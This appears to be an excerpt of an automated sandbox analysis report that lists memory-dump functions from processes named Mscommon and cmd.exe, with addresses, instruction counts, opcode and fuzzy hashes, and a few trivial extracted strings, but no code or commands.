Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f5bfcbb19a4b42c190a079bd8ddfeee3ed9bc2292948fb0e7ae46223703aeb7
Instruction ID: ca6712a862a930a8915dc20d6a2206266112c39c378ef30e03cd9574b312388d
Opcode Fuzzy Hash: 4f5bfcbb19a4b42c190a079bd8ddfeee3ed9bc2292948fb0e7ae46223703aeb7
Instruction Fuzzy Hash: F101D271A0E28E8FE7229BA4C8602EE7B70EF82711F0542B3D455DB1E2CA782604C745

Function 00007FFD9BADB3A2 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5537c81e21c29ab5100b3fd733abac75941d878031bc1a667f5f864665178be3
Instruction ID: 9788813388e37e527e8c1543263a982e2afdcc0e3fd75ab2cd50913a2a0fbf2c
Opcode Fuzzy Hash: 5537c81e21c29ab5100b3fd733abac75941d878031bc1a667f5f864665178be3
Instruction Fuzzy Hash: 1D21EA70E0666D8EEB70EB54C8547EDB3B1EBD5311F1042E9C00DA2291DBB95AD5CF05

Function 00007FFD9BAD8ED2 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d3908c6a8591edd985ba8eb1238f4e1f4ac7b3b4cd93431749f504880a843be
Instruction ID: bce1c344575b0f15800930814374db21548ea36b206fa403a184fff431c99aef
Opcode Fuzzy Hash: 2d3908c6a8591edd985ba8eb1238f4e1f4ac7b3b4cd93431749f504880a843be
Instruction Fuzzy Hash: 2911ED30D1956D8EEB74DB54C8647ECB6B1AB94705F4142FAD00DA62A1DFB86BC4CF00

Function 00007FFD9C1B8B07 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53a3aac6b85fbf77b8397f1c900831127387e09a1e636b1fd1f039fb2781fc0
Instruction ID: 763650fdf6414ecbb64957d25c1a4624b851941ce661d084523507d1edb7f3df
Opcode Fuzzy Hash: a53a3aac6b85fbf77b8397f1c900831127387e09a1e636b1fd1f039fb2781fc0
Instruction Fuzzy Hash: 9201D271A0851E8FDFA8DF14C4A4BA877B1FB68701F1444EED00EE7651DA316A84CF44

Function 00007FFD9C1B69CD Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cad0498b6a15c75c1a47cdfdc1b3c4e01176a86c368e896bf2b050480341223c
Instruction ID: ab108eefefd0414801b5da063b8965d8d8a56e22d62070bbae81e2c79d4f33a6
Opcode Fuzzy Hash: cad0498b6a15c75c1a47cdfdc1b3c4e01176a86c368e896bf2b050480341223c
Instruction Fuzzy Hash: 6DF02653A4DA834FEB7C96B484B10747AA0EF25290B0502FAC04E966DBED08FC848B46

Function 00007FFD9C1BDCA2 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5ddf90fb0f728b4fa616d9b25c2390c2c16b84c363068a9eeca8369e00a441a
Instruction ID: 914bc08c36b51967a57e69faba11f920d338abe5069adb784423145c00e8007b
Opcode Fuzzy Hash: f5ddf90fb0f728b4fa616d9b25c2390c2c16b84c363068a9eeca8369e00a441a
Instruction Fuzzy Hash: 9FF0F63244E2C69FF316ABB088214D53FB0AF03280B0800FAD445C70A6C96D760ACB51

Function 00007FFD9BAD06A5 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 188d961101a50b419a09593e5e7878cc938705dcf7427da0633d933c13b22cb3
Instruction ID: 352625aa54612fc349b0161d8f03f3cc81c8a12c85e5a09f1e6ce180a24f3a81
Opcode Fuzzy Hash: 188d961101a50b419a09593e5e7878cc938705dcf7427da0633d933c13b22cb3
Instruction Fuzzy Hash: 02F03030A05A5E9FEB60EF58D4596FD77A0FFA4304F514536E41CC21A0DAB46290CB84

Function 00007FFD9BAD06C8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8adb69c6af029dc92e951df34f37163f773f9368e55b3e125fdf7a952712489e
Instruction ID: 323dddd7e9344577f5fe3ffe138b0d192d2e0cf076e4a7743422de21aa819809
Opcode Fuzzy Hash: 8adb69c6af029dc92e951df34f37163f773f9368e55b3e125fdf7a952712489e
Instruction Fuzzy Hash: AAF0123091594E9FDB90EF64D8596FE77E0FF54304F414566E81CD3160DA70A6A0CB80

Function 00007FFD9BAD0B18 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f1e3eef51b2f378d8511651c88b9840147e86e646fae9d6e4aa1043a3dc8ad8
Instruction ID: ee153edbecf04e651efe8069055bb913e85e6ebe585577059190afa850edcaf3
Opcode Fuzzy Hash: 2f1e3eef51b2f378d8511651c88b9840147e86e646fae9d6e4aa1043a3dc8ad8
Instruction Fuzzy Hash: BEF0A534908A4EDFDBA4EF58D955BAA77A0FF58304F010165E81DC3264D774EAA4CB81

Function 00007FFD9C1B6A35 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33dbef8cf557947d67f95887b3236349983b52a32d592ceb6749f45145028849
Instruction ID: ba3bd13aceea2cf24f729376c799705f695517749ce180a5def5ad4cd44e40f6
Opcode Fuzzy Hash: 33dbef8cf557947d67f95887b3236349983b52a32d592ceb6749f45145028849
Instruction Fuzzy Hash: 04E0D83395D38A8FDB75DB6088650EC7F70BF50340F5401E7E50816182DB249B189B42

Function 00007FFD9C1BE997 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 622ce29244440628703ef38b2beb68f552346ac0245390ac8e0bb8bcf5677fd9
Instruction ID: c082b17f2e8a12bd5c5129c745d9820827a673ac7d730d0bd728150862e8d674
Opcode Fuzzy Hash: 622ce29244440628703ef38b2beb68f552346ac0245390ac8e0bb8bcf5677fd9
Instruction Fuzzy Hash: 4EE08C43F0CA834BFBB206B008B10382AA09F463C0B0804B6E18A9A2CBD95828084B1A

Function 00007FFD9C1B9207 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 661e17db2a50cca76524725258e5f7489cd7ab732d7d27c7612ab90f8907b24d
Instruction ID: bdf20bbc62a30a8cbbcda35071dc462d69f95cdda2a67ff47e97bfcf7f32bca4
Opcode Fuzzy Hash: 661e17db2a50cca76524725258e5f7489cd7ab732d7d27c7612ab90f8907b24d
Instruction Fuzzy Hash: 14E01242F0DA835BFB3646B448B50787FB19F073C4F1409F5E18A9A2D7C9583816DB29

Function 00007FFD9BAD815F Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a579d132824d97c269f86fa8aab0a0b6516d6c6d064fbf799aa167fa0911013
Instruction ID: 3889cda446419b07c8a15bb132ca4a897c68357288804e55d4449e3c384bdd94
Opcode Fuzzy Hash: 8a579d132824d97c269f86fa8aab0a0b6516d6c6d064fbf799aa167fa0911013
Instruction Fuzzy Hash: 3BE0B630B0A6194FE768DA48D8A0AE966A1BB84354F1043E5A00D9669ADA742E858E40

Function 00007FFD9C1BF47B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a40d3cf6e15dab64fccae4e4d47597c5b5d6015f0e832f2ad277dff738981f
Instruction ID: c5d5a09ddd8200caffb12a0d83a80ee4bbfd3df577cf0afa17457a8ca3e06c69
Opcode Fuzzy Hash: 61a40d3cf6e15dab64fccae4e4d47597c5b5d6015f0e832f2ad277dff738981f
Instruction Fuzzy Hash: 74D0121EF0D503C9F13846C1817027D95B08F44380E20843EC49F718DDCD1D78026E2D

Function 00007FFD9C1B9CDB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
Instruction ID: af9e0b37b4356056d9fa78fc3c19416521ae59050ba258769910440b6e54242e
Opcode Fuzzy Hash: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
Instruction Fuzzy Hash: 50D0C912B0C54385F678668140B037D65F56F04380E20403ED45F618C9CD2C7803AE1D

Non-executed Functions

Function 00007FFD9BC8BA5D Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2037550413.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bc80000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b13026e54bddcb13a46ae02aaf11835892e4624e1ef5368c0443a30222f1a1cd
Instruction ID: 5543092268793404d7dbcb1ba13d49ea8457ec28fd6faaee3bbfafcf3a55b429
Opcode Fuzzy Hash: b13026e54bddcb13a46ae02aaf11835892e4624e1ef5368c0443a30222f1a1cd
Instruction Fuzzy Hash: 9A31F470E08A1D8FCF94DF98D491AEDBBF1FB69300F20516AE019E3294DA35AA41CB44

Analysis Process: cmd.exePID: 7572, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9BAEAA0D Relevance: 5.5, Strings: 2, Instructions: 3035COMMON

Download Yara Rule

Strings

iJ_H, xrefs: 00007FFD9BAEBB6F
tU_H, xrefs: 00007FFD9BAEAFCF

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9baea000_cmd.jbxd

Similarity

API ID:
String ID: iJ_H$tU_H
API String ID: 0-1733113414
Opcode ID: 474e4cc3462453c8a1289e04171dad1f2a88b6cbcac5f95359600e1ffb127c24
Instruction ID: 235e5e4939bf1ea4373602ab5b0953b71926b9df2a4f0640490148c7d53dbb12
Opcode Fuzzy Hash: 474e4cc3462453c8a1289e04171dad1f2a88b6cbcac5f95359600e1ffb127c24
Instruction Fuzzy Hash: B8431C70E1991D8FDBA8DF58C8A5BA9B7B1FF58310F1042E9D04DE7292DA746A81CF40

Function 00007FFD9BAD0DA8 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bad0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621476d9127ec66acbfb3650a81f7d00f2c3f1679a6cbbfb74b0e183a3ca9f89
Instruction ID: 33c69b466352fba58a250988b880023b68d2e08813d8c4277e9d1ea5c6ec1145
Opcode Fuzzy Hash: 621476d9127ec66acbfb3650a81f7d00f2c3f1679a6cbbfb74b0e183a3ca9f89
Instruction Fuzzy Hash: ABA1C171A1994D8FE798EB68C8757A97BE1FF99314F4102BED048D72E6CBB81801CB40

Function 00007FFD9BB1C14D Relevance: 1.7, Strings: 1, Instructions: 432COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BB1C15A

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb19000_cmd.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 923a31c5b88139c033223599f24fa0e24fa205535f7b1d28daedb39594178bf7
Instruction ID: b21ec7aaf9ba9484ea799a568f12da439a47e79bbff134fbcce750edd7080bd3
Opcode Fuzzy Hash: 923a31c5b88139c033223599f24fa0e24fa205535f7b1d28daedb39594178bf7
Instruction Fuzzy Hash: 26F15E71E19A5D8FDBA8EF98C8A57B8B7A1FF58304F0441B9D01DE72D2DA346980CB41

Function 00007FFD9BAE5BC3 Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

., xrefs: 00007FFD9BAE5C21

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAE5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bae5000_cmd.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 83b735841f6f73fa5d5a864133d8b52f8c1dfdd8689adf485fe9f15e3292b81b
Instruction ID: a8b982f125d64f45bf1605dd134902e8b8572656c31dd07026ed540e9e652469
Opcode Fuzzy Hash: 83b735841f6f73fa5d5a864133d8b52f8c1dfdd8689adf485fe9f15e3292b81b
Instruction Fuzzy Hash: 6231C574A09A2D8FDBA8DF48D8A47E8B3B1EB99301F1141E9D04DA7291CB745AC4CF40

Function 00007FFD9BB14639 Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BB14649

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB13000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB13000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb13000_cmd.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 5c9a60943406b2e4bd0da6ce70633ef07ea8e03b445eed72179fe4adce67e687
Instruction ID: 0d448cc620b37f488179cd522d35c3e3cdb686a15738ee2e0abbd5212f6549b1
Opcode Fuzzy Hash: 5c9a60943406b2e4bd0da6ce70633ef07ea8e03b445eed72179fe4adce67e687
Instruction Fuzzy Hash: 13115B3090864D8FCF85EF68C859AEA7BF0FF28305F0105AAE819D72A1DB34E554CB80

Function 00007FFD9BB08739 Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BB0874A

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB04000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb04000_cmd.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: a2cf3c980a58266f84ed69805bbafd98c055249401995de366a95ad156bf03b7
Instruction ID: 21355f2062d70bcdd20a353828cba7cb9d313eb90fa3ce8b137e3e67308287d0
Opcode Fuzzy Hash: a2cf3c980a58266f84ed69805bbafd98c055249401995de366a95ad156bf03b7
Instruction Fuzzy Hash: 9A115E30918A8D8FCF45EF68C858AEA7BF0FF29305F0541AAD459C72A5DB34A554CB81

Function 00007FFD9BB0E4A9 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BB0E4BA

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB04000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb04000_cmd.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: fba1773e9d2596ae89e13be7a0ff3969581edfbd88f16ea80ac154600730b177
Instruction ID: 8e6c17f4b022cdfb0ab3de5dee8f98a5cb4d01123c89d46e4f7a0c35355a3f42
Opcode Fuzzy Hash: fba1773e9d2596ae89e13be7a0ff3969581edfbd88f16ea80ac154600730b177
Instruction Fuzzy Hash: 98014C30908A8D8FCF85EF68C858AAE7BF0FF29305F0445AAD419D72A5DB349654CB80

Function 00007FFD9BB1C6B9 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BB1C6CA

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb19000_cmd.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 4c9cef0e79900443e0689ce75f945bfee84e0a77a9472d1d2ab79bc22f13b171
Instruction ID: 8f49431e0b70be9728e36664ff8a90c009ebf84f706ceb4206e9eb9b2844a882
Opcode Fuzzy Hash: 4c9cef0e79900443e0689ce75f945bfee84e0a77a9472d1d2ab79bc22f13b171
Instruction Fuzzy Hash: FB01213091868D8FCF45DF68C8599D97BB0FF19304F4541AAE449C72A2DB34E994CB81

Function 00007FFD9BB21AE9 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BB21AFA

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb19000_cmd.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 978cafb6abae724e87c7f6159fc1382d49bf28852c72fc95121c4e08e70f46fa
Instruction ID: c9e0d3fd2380bc8630aa654c962a194dd90d53aa73236abffcefaae4f2c660ac
Opcode Fuzzy Hash: 978cafb6abae724e87c7f6159fc1382d49bf28852c72fc95121c4e08e70f46fa
Instruction Fuzzy Hash: 5D01813090868D8FCF49DF24C454AE97BB0FF29304F4141EAE418C72A2DB349A55CB80

Function 00007FFD9BB0F72D Relevance: 1.3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BB0F73A

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB04000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb04000_cmd.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 860b3702628137b1cc4b89c03de2364eec4be1e511dc512b62064da7b073ad01
Instruction ID: eb06e59caaddf274cc12ca0a53e0803dfdab95eb606792fb782194f4fefacb24
Opcode Fuzzy Hash: 860b3702628137b1cc4b89c03de2364eec4be1e511dc512b62064da7b073ad01
Instruction Fuzzy Hash: 72F06D3091968D8FCB81DF28C954AE977E0FF04300F4400E5E858CB1A6D738EA14CB00

Function 00007FFD9BAEF2C1 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9baea000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f34a88954ab193465f483e4ddda7f955889d7a643694ff2268b08eb873fbe24
Instruction ID: fd34c0fd4966acb043a39a5a755ba8400116746b1c09391937a108f575f28283
Opcode Fuzzy Hash: 0f34a88954ab193465f483e4ddda7f955889d7a643694ff2268b08eb873fbe24
Instruction Fuzzy Hash: 1CB1BF3090D78D8FDB56EF6488695E97BF0FF55300F0541ABD818C71A2DA78AA48CB41

Function 00007FFD9BAEF6F5 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9baea000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a802a23b368a88fa09987da4c45c48796e23d7b697f16d7811d7847a342c070e
Instruction ID: c713ac1560b2fc2ce23f9b7fc388bd9956a9315994a834c4af2ffc885264fad0
Opcode Fuzzy Hash: a802a23b368a88fa09987da4c45c48796e23d7b697f16d7811d7847a342c070e
Instruction Fuzzy Hash: 8191D631D0E68D8FEB669B6488656FD7BB0EF05300F0601BBD458D71E2DEB96A48CB41

Function 00007FFD9BAEF340 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9baea000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55ee5167377cbb513a5da6fd7a560e1367e64360f1a48036bfc2ae7a972aa944
Instruction ID: c63ced8d339e99fb822fe77158f21b41738d1b850a8636dfb8f651a0bfe99384
Opcode Fuzzy Hash: 55ee5167377cbb513a5da6fd7a560e1367e64360f1a48036bfc2ae7a972aa944
Instruction Fuzzy Hash: FB91A03090978D8FDB55EF68C859AEA7BF0FF19300F0141ABD818C71A2DB74AA58CB41

Function 00007FFD9BB0E7E4 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB04000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb04000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09f7cb860979e9082c6f8675db9be7251ffe5a7e8a340428544667b0bdcabcd9
Instruction ID: 66362824c884e249c93f35f69e2c396d11d3bc4913ae67e7c4a1f6c7fb634cf4
Opcode Fuzzy Hash: 09f7cb860979e9082c6f8675db9be7251ffe5a7e8a340428544667b0bdcabcd9
Instruction Fuzzy Hash: 7A91F974E0861D8FDB98EF68C8A5AADB7B2FF58304F5040A9D41DE7299CB34A941CF41

Function 00007FFD9BAEF410 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9baea000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a74efb162e22ddd3af39756e7b20a0c6614f415d3f5e7cd9999b34c5cfc4928
Instruction ID: e942eeb3db282ce55383c9f16ce8d64985e2feae191740a119755358bd4a593f
Opcode Fuzzy Hash: 7a74efb162e22ddd3af39756e7b20a0c6614f415d3f5e7cd9999b34c5cfc4928
Instruction Fuzzy Hash: E751A03090968D8FDB55EF68C859AEE7BF0FF29300F0145ABD818C71A2DB74A654CB81

Function 00007FFD9BB226CE Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb19000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27939705f5d471ab7c158c2689d8914651cf5ada50717f313886abb7918588c3
Instruction ID: 4b11d9fd091d48116b9fc1e7718b3dc998c5eeef8af954acb103a5074786c084
Opcode Fuzzy Hash: 27939705f5d471ab7c158c2689d8914651cf5ada50717f313886abb7918588c3
Instruction Fuzzy Hash: CF51C670E1461D8FDB94EF98C895BADB7B2FF68305F108269D408E72A5CB346985CB41

Function 00007FFD9BAD0910 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bad0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af3c6ee0a38528657ca4427cd06437fbb8d07462c4983984983ae5baefa3253c
Instruction ID: 2f3cc61d3ee643ff42e0010e16e8e63742a35a04a72a493502d4907ab6af9a44
Opcode Fuzzy Hash: af3c6ee0a38528657ca4427cd06437fbb8d07462c4983984983ae5baefa3253c
Instruction Fuzzy Hash: 3A519031A0855D8FDB54EFA8D8A5AED7BB0FF58325F04027AD409D71A6CB34A841CB80

Function 00007FFD9BAE7D19 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BAE5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bae5000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fac12cde0bcc0c7d96c21c2da1bb0f5f4f672cbf2831e92e36b3cad3682c23b8
Instruction ID: 3dc909c4fe8fa6fa37d825b65d9fc3baf8e9f77fec412f55bdc4cf602fa425a0
Opcode Fuzzy Hash: fac12cde0bcc0c7d96c21c2da1bb0f5f4f672cbf2831e92e36b3cad3682c23b8
Instruction Fuzzy Hash: 00519F70A09A4D9FCF84EF98D494EED7BF1FF58310B0901AAE409E7261D674E990CB81

Function 00007FFD9BB1A86E Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2180554437.00007FFD9BB19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bb19000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
